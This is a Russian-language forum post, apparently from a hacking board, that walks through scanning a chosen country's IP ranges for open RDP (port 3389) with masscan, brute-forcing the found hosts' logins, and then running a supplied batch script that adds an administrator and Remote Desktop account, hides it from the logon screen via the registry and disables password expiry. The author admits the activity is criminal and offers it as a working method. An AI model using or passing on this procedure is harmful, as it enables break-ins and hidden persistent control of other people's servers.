Приветствую. Сразу к нюансам этого способа: Сам по себе "брут" это уголовно наказуемая тема, как правило это Статья 349. Несанкционированный доступ к компьютерной информации: Скачать масскан можно тут : https://goo.gl/jC8jN5 Почитать можно тут https://xakep.ru/2013/09/16/61262/ ip.txt — список ip(CIDR) Для удобства я положил в тот же архив start.bat: masscan.exe -iL ip.txt -p3389 --rate 3000 -oL result.txt —rate 3000 — не советую ставить очень более 30к(при условии что на дедике канал менее 50/50), иначе дед просто перестанет коннектится до тех пор, пока скан не будет закончен Возможные проблемы: Q: После запуска не программа не может найти MSVCR120.dll A: Не установлен Visual C++ Скачать: Скрытое содержимое: **Скрытое содержимое: Для просмотра Вам необходимо минимум 1 сообщений на форуме.**Q: После запуска программа не может найти winpcap.dll A: Скачайте и установите winpcap(https://www.winpcap.org/install/) Далее нам нужно выбрать страну, которую и будем в дальнейшем сканить и брутить, есть довольно таки свежая база в CIDR, можно найти тут: https://www.countryipblocks.net/country_selection.php Я для примера решил взять "ARGENTINA" После выбора страны жмем "create acl", все что вам выдало в правом окне копируем, вставляем в ip.txt и запускаем start.bat Дожидаемся окончания скана, в той же папке появится файл result.txt, это файл с ип, на которых открыт порт 3389(Remote Desktop Protocol), но в том виде, в котором его дает сканер, не подходит для брута, поэтому берем парсер, скачать можно тут(Пароль на архив dservers.ru) В первом поле следует указать путь до файла результатов, который был сделан сканером result.txt а во второе поле путь до нового файла только с ип, у меня он называется result_clean.txt Запускаем брут: Вкладка "брутфорс по диапазонам" нам не нужна, потому как сканер в этом бруте не очень, да и ип мы уже насканили. Как вы уже поняли, в соотв. с полями(они подписаны), в первое окно вписываем предполагаемые логины, в третье - пароли на которые будем брутить, ну и в 4 нужно перетащить файл с ип result_clean.txt Жмем старт и ждем результатов: * Не советую ставить очень много потоков, хватит и 100-200 вполне, а вот тайм-аут можно увеличить до 7-10 Теперь поговорим о создании учетки: Ниже текст для файла .bat который создаст и скроет вашу учетную запись с винлогина: Код: net user myuser mypassword /add net localgroup Administrators myuser/add net localgroup "Remote Desktop Users" myuser/add net accounts /maxpwage:unlimited reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ЛОГИН /t REG_DWORD /d "00000000" /f exit Не забудьте myuser заменить на свой логин(желательно придумать что то похожее на системный логин) и mypassword - на ваш пароль. Создайте тхт, назовем его user.txt, вставьте текст данный выше и переменяйте в user.bat, все, после этого на сбрученом дедике запускайте этот батник, выходите с учетки админа(которую сбрутили) и заходите со своим логином Статья будет дописываться по мере необходимости. Всем спасибо.